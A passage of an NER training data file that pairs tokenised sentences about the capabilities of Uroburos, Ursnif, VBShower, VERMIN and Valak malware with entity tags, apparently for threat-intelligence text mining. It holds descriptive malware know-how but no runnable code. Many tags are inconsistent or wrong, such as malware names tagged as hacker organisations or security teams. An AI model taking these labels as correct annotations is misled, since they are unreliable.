"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "search", - "for", - "specific", - "files", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "store", - "configuration", - "information", - "for", - "the", - "kernel", - "driver", - "and", - "kernel", - "driver", - "loader", - "components", - "in", - "an", - "encrypted", - "blob", - "typically", - "found", - "at", - "`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds.`" - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "concealed", - "storage", - "mechanisms", - "including", - "an", - "NTFS", - "or", - "FAT-16", - "filesystem", - "encrypted", - "with", - "CAST-128", - "in", - "CBC", - "mode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "a", - "`Put`", - "command", - "to", - "write", - "files", - "to", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "the", - "ability", - "to", - "move", - "data", - "between", - "its", - "kernel", - "and", - "user", - "mode", - "components,", - "generally", - "using", - "named", - "pipes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "add", - "extra", - "characters", - "in", - "encoded", - "strings", - "to", - "help", - "mimic", - "DNS", - "legitimate", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "custom", - "communications", - "protocols", - "that", - "ride", - "over", - "SMTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "registered", - "a", - "service", - "named", - "`WerFaultSvc`,", - "likely", - "to", - "spoof", - "the", - "legitimate", - "Windows", - "error", - "reporting", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "store", - "configuration", - "information", - "in", - "the", - "Registry", - "including", - "the", - "initialization", - "vector", - "and", - "AES", - "key", - "needed", - "to", - "find", - "and", - "decrypt", - "other", - "Uroburos", - "components." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Individual", - "Uroburos", - "implants", - "can", - "use", - "multiple", - "communication", - "channels", - "based", - "on", - "one", - "of", - "four", - "available", - "modes", - "of", - "operation." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "implants", - "on", - "multiple", - "compromised", - "machines", - "to", - "proxy", - "communications", - "through", - "its", - "worldwide", - "P2P", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "native", - "Windows", - "APIs", - "including", - "`GetHostByName`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "communicate", - "through", - "custom", - "methodologies", - "for", - "UDP,", - "ICMP,", - "and", - "TCP", - "that", - "use", - "distinct", - "sessions", - "to", - "ride", - "over", - "the", - "legitimate", - "protocols." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "a", - "custom", - "base62", - "and", - "a", - "de-facto", - "base32", - "encoding", - "that", - "uses", - "digits", - "0-9", - "and", - "lowercase", - "letters", - "a-z", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "its", - "`Process", - "List`", - "command", - "to", - "enumerate", - "processes", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "custom", - "communication", - "methodologies", - "that", - "ride", - "over", - "common", - "protocols", - "including", - "TCP,", - "UDP,", - "HTTP,", - "SMTP,", - "and", - "DNS", - "in", - "order", - "to", - "blend", - "with", - "normal", - "network", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "the", - "ability", - "to", - "communicate", - "over", - "custom", - "communications", - "methodologies", - "that", - "ride", - "over", - "common", - "network", - "protocols", - "including", - "raw", - "TCP", - "and", - "UDP", - "sockets,", - "HTTP,", - "SMTP,", - "and", - "DNS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "query", - "the", - "Registry,", - "typically", - "`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds`,", - "to", - "find", - "the", - "key", - "and", - "path", - "to", - "decrypt", - "and", - "load", - "its", - "kernel", - "driver", - "and", - "kernel", - "driver", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "the", - "ability", - "to", - "load", - "new", - "modules", - "directly", - "into", - "memory", - "using", - "its", - "`Load", - "Modules", - "Mem`", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "its", - "kernel", - "module", - "to", - "prevent", - "its", - "host", - "components", - "from", - "being", - "listed", - "by", - "the", - "targeted", - "system's", - "OS", - "and", - "to", - "mediate", - "requests", - "between", - "user", - "mode", - "and", - "concealed", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "uses", - "a", - "custom", - "packer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "encrypt", - "the", - "data", - "beneath", - "its", - "http2", - "or", - "tcp", - "encryption", - "at", - "the", - "session", - "layer", - "with", - "CAST-128,", - "using", - "a", - "different", - "key", - "for", - "incoming", - "and", - "outgoing", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "the", - "ability", - "to", - "gather", - "basic", - "system", - "information", - "and", - "run", - "the", - "POSIX", - "API", - "`gethostbyname`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "intercept", - "the", - "first", - "client", - "to", - "server", - "packet", - "in", - "the", - "3-way", - "TCP", - "handshake", - "to", - "determine", - "if", - "the", - "packet", - "contains", - "the", - "correct", - "unique", - "value", - "for", - "a", - "specific", - "Uroburos", - "implant.", - "If", - "the", - "value", - "does", - "not", - "match,", - "the", - "packet", - "and", - "the", - "rest", - "of", - "the", - "TCP", - "session", - "are", - "passed", - "to", - "the", - "legitimate", - "listening", - "application." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "a", - "custom", - "HTTP-based", - "protocol", - "for", - "large", - "data", - "communications", - "that", - "can", - "blend", - "with", - "normal", - "network", - "traffic", - "by", - "riding", - "on", - "top", - "of", - "standard", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "the", - "ability", - "to", - "use", - "the", - "command", - "line", - "for", - "execution", - "on", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "registered", - "a", - "service,", - "typically", - "named", - "`WerFaultSvc`,", - "to", - "decrypt", - "and", - "find", - "a", - "kernel", - "driver", - "and", - "kernel", - "driver", - "loader", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "injected", - "HTML", - "codes", - "into", - "banking", - "sites", - "to", - "steal", - "sensitive", - "online", - "banking", - "information", - "(ex:", - "usernames", - "and", - "passwords)." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "execute", - "base64", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "have", - "used", - "COM", - "objects", - "to", - "execute", - "the", - "malware's", - "full", - "executable", - "payload." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "hooked", - "APIs", - "to", - "perform", - "a", - "wide", - "variety", - "of", - "information", - "theft,", - "such", - "as", - "monitoring", - "traffic", - "from", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "encoded", - "data", - "in", - "HTTP", - "URLs", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "collected", - "files", - "from", - "victim", - "machines,", - "including", - "certificates", - "and", - "cookies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "crypto", - "key", - "information", - "stored", - "in", - "the", - "Registry", - "to", - "decrypt", - "Tor", - "clients", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "a", - "DGA", - "to", - "generate", - "domain", - "names", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "an", - "XOR-based", - "algorithm", - "to", - "encrypt", - "Tor", - "clients", - "dropped", - "to", - "disk.", - "Ursnif", - "droppers", - "have", - "also", - "been", - "delivered", - "as", - "password-protected", - "zip", - "files", - "that", - "execute", - "base64", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "HTTP", - "POSTs", - "to", - "exfil", - "gathered", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "deleted", - "data", - "staged", - "in", - "tmp", - "files", - "after", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "have", - "used", - "COM", - "properties", - "to", - "execute", - "malware", - "in", - "hidden", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "dropped", - "payload", - "and", - "configuration", - "files", - "to", - "disk.", - "Ursnif", - "has", - "also", - "been", - "used", - "to", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "tmp", - "files", - "to", - "stage", - "gathered", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "strings", - "from", - "legitimate", - "system", - "files", - "and", - "existing", - "folders", - "for", - "its", - "file,", - "folder,", - "and", - "Registry", - "entry", - "names." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "Registry", - "modifications", - "as", - "part", - "of", - "its", - "installation", - "routine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "Tor", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "<code>CreateProcessW</code>", - "to", - "create", - "child", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "have", - "used", - "PowerShell", - "in", - "download", - "cradles", - "to", - "download", - "and", - "execute", - "the", - "malware's", - "full", - "executable", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "gathered", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "process", - "hollowing", - "to", - "inject", - "into", - "child", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "a", - "peer-to-peer", - "(P2P)", - "network", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "Reg", - "to", - "query", - "the", - "Registry", - "for", - "installed", - "programs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "Registry", - "Run", - "keys", - "to", - "establish", - "automatic", - "execution", - "at", - "system", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "copied", - "itself", - "to", - "and", - "infected", - "removable", - "drives", - "for", - "propagation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "hooked", - "APIs", - "to", - "take", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "Systeminfo", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "gathered", - "information", - "about", - "running", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "copied", - "itself", - "to", - "and", - "infected", - "files", - "in", - "network", - "drives", - "for", - "propagation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "injected", - "code", - "into", - "target", - "processes", - "via", - "thread", - "local", - "storage", - "callbacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "a", - "30", - "minute", - "delay", - "after", - "execution", - "to", - "evade", - "sandbox", - "monitoring", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "have", - "used", - "VBA", - "macros", - "to", - "download", - "and", - "execute", - "the", - "malware's", - "full", - "executable", - "payload." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "used", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "droppers", - "have", - "used", - "WMI", - "classes", - "to", - "execute", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ursnif", - "has", - "registered", - "itself", - "as", - "a", - "system", - "service", - "in", - "the", - "Registry", - "for", - "automatic", - "execution", - "at", - "system", - "startup." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VBShower", - "has", - "attempted", - "to", - "complicate", - "forensic", - "analysis", - "by", - "deleting", - "all", - "the", - "files", - "contained", - "in", - "<code>%APPDATA%\\..\\Local\\Temporary", - "Internet", - "Files\\Content.Word</code>", - "and", - "<code>%APPDATA%\\..\\Local", - "Settings\\Temporary", - "Internet", - "Files\\Content.Word\\</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VBShower", - "has", - "the", - "ability", - "to", - "download", - "VBS", - "files", - "to", - "the", - "target", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VBShower", - "used", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}</code>", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VBShower", - "has", - "the", - "ability", - "to", - "execute", - "VBScript", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "VBShower", - "has", - "attempted", - "to", - "obtain", - "a", - "VBS", - "script", - "from", - "command", - "and", - "control", - "(C2)", - "nodes", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "VERMIN", - "encrypts", - "the", - "collected", - "files", - "using", - "3-DES." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "VERMIN", - "can", - "perform", - "audio", - "capture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "saves", - "each", - "collected", - "file", - "with", - "the", - "automatically", - "generated", - "format", - "{0:dd-MM-yyyy}.txt", - "." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "collects", - "data", - "stored", - "in", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "decrypts", - "code,", - "strings,", - "and", - "commands", - "to", - "use", - "once", - "it's", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "is", - "obfuscated", - "using", - "the", - "obfuscation", - "tool", - "called", - "ConfuserEx." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "VERMIN", - "can", - "delete", - "files", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "can", - "download", - "and", - "upload", - "files", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "collects", - "keystrokes", - "from", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "can", - "get", - "a", - "list", - "of", - "the", - "processes", - "and", - "running", - "tasks", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "can", - "perform", - "screen", - "captures", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "uses", - "WMI", - "to", - "check", - "for", - "anti-virus", - "software", - "installed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "is", - "initially", - "packed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "VERMIN", - "collects", - "the", - "OS", - "name,", - "machine", - "name,", - "and", - "architecture", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "gathers", - "the", - "local", - "IP", - "address." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "gathers", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VERMIN", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "download", - "a", - "module", - "to", - "search", - "for", - "and", - "build", - "a", - "report", - "of", - "harvested", - "credential", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "use", - "the", - "clientgrabber", - "module", - "to", - "steal", - "e-mail", - "credentials", - "from", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "decode", - "and", - "decrypt", - "downloaded", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "enumerate", - "domain", - "admin", - "accounts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "execute", - "tasks", - "via", - "OLE." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "exfiltrate", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "communicate", - "over", - "multiple", - "C2", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 